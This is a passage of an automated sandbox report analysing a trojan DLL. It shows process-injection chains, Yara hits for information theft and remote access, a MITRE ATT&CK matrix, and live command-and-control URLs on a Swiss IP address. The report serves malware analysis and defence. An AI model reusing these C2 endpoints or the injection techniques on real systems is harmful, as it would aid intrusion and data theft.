                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 0000001D.00000000.434255940.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.434267332.0000000005E60000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455054907.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.424853777.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455231831.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455646233.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager,
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455231831.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455646233.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03433365 cpuid 2_2_03433365
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034881F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,2_2_034881F1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034341FA HeapFree,GetSystemTimeAsFileTime,HeapFree,2_2_034341FA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03436D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_03436D78
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03433365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_03433365

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      Source: Yara match | File source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      MITRE ATT&CK matrix columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      1
                      Valid Accounts
                      1
                      Windows Management Instrumentation
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      1
                      Obfuscated Files or Information
                      1
                      Input Capture
                      1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts3
                      Native API
                      Boot or Logon Initialization Scripts1
                      Access Token Manipulation
                      1
                      File Deletion
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol1
                      Email Collection
                      Exfiltration Over Bluetooth2
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter
                      Logon Script (Windows)813
                      Process Injection
                      1
                      Masquerading
                      Security Account Manager3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Input Capture
                      Automated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts
                      NTDS25
                      System Information Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation
                      LSA Secrets1
                      Query Registry
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials11
                      Security Software Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items813
                      Process Injection
                      DCSync31
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc Filesystem3
                      Process Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery
                      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery
                      Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery
                      Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph ID: 620332 | Sample: xaj0e933Uv.dll | Startdate: 04/05/2022 | Architecture: WINDOWS | Score: 100

                      Start (node 2)
                        Signatures: Snort IDS alert for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 2 other signatures
                        -> loaddll32.exe (11) started
                           -> cmd.exe (15) started
                              -> rundll32.exe (20) started
                                 DNS/IP: 185.189.151.28, 49769, 80, AS-SOFTPLUSCH, Switzerland
                                 Signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
                                 -> control.exe (31) started
                                    Signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
                                    -> explorer.exe (38) injected
                                       Signatures: Self deletion via cmd delete; Disables SPDY (HTTP compression, likely to perform web injects)
                                       -> cmd.exe (41) started
                                          Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                                          -> conhost.exe (48) started
                                          -> PING.EXE (50) started
                                       -> RuntimeBroker.exe (44) injected
                                       -> cmd.exe (46) started
                        -> mshta.exe (13) started
                           -> powershell.exe (17) started
                              Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
                              -> csc.exe (24) started
                                 Dropped: C:\Users\user\AppData\Local\...\m5pod5s5.dll, PE32
                                 -> cvtres.exe (34) started
                              -> csc.exe (27) started
                                 Dropped: C:\Users\user\AppData\Local\...\a1gxko15.dll, PE32
                                 -> cvtres.exe (36) started
                              -> conhost.exe (29) started

                      Source | Detection | Scanner | Label
                      xaj0e933Uv.dll | 40% | Virustotal |
                      xaj0e933Uv.dll | 48% | ReversingLabs | Win32.Trojan.Zenpak
                      xaj0e933Uv.dll | 100% | Joe Sandbox ML |

                      No Antivirus matches

                      Source | Detection | Scanner | Label
                      2.2.rundll32.exe.3430000.0.unpack | 100% | Avira | HEUR/AGEN.1245293

                      Source | Detection | Scanner | Label
                      l-0007.l-dc-msedge.net | 0% | Virustotal |

                      Source | Detection | Scanner | Label
                      http://185.189.151.28/ | 0% | Avira URL Cloud | safe
                      http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS | 0% | Avira URL Cloud | safe
                      http://crl.osofts/Microt0 | 0% | URL Reputation | safe
                      http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2 | 0% | Avira URL Cloud | safe
                      http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
                      http://crl.micro | 0% | URL Reputation | safe
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk | 0% | Avira URL Cloud | safe
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2 | 0% | Avira URL Cloud | safe
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk | 0% | Avira URL Cloud | safe
                      http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      l-0007.l-dc-msedge.net | 13.107.43.16 | true | true |  | unknown
                      Name | Malicious | Antivirus Detection | Reputation
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk | Malicious: true
                      • Avira URL Cloud: safe
                      unknown
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk | Malicious: true
                      • Avira URL Cloud: safe
                      unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://185.189.151.28/ | rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp | Malicious: false
                      • Avira URL Cloud: safe
                      unknown
                      http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | Malicious: false
                      • Avira URL Cloud: safe
                      low
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS | rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343411047.0000000003337000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmp | Malicious: false
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.osofts/Microt0powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.micropowershell.exe, 00000012.00000003.416780801.000001E636303000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.559953766.000001E636304000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:620332
Start date and time:2022-05-04 16:25:58 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 32s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:xaj0e933Uv.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:38
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@25/17@0/1
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 19.9% (good quality ratio 19.1%)
                      • Quality average: 82.2%
                      • Quality standard deviation: 27.1%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 112
                      • Number of non-executed functions: 210
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.43.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 6548 because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
16:27:23 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
16:28:07 | API Interceptor | 36x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection
185.189.151.28 | qOfIxt1fnQ.dll | malicious
185.189.151.28 | 2oCOO5LbPu.dll | malicious
185.189.151.28 | rXN8OIpbzz.dll | malicious
185.189.151.28 | GlJdt15gDI.dll | malicious
Match | Associated Sample Name / URL | Detection | Context
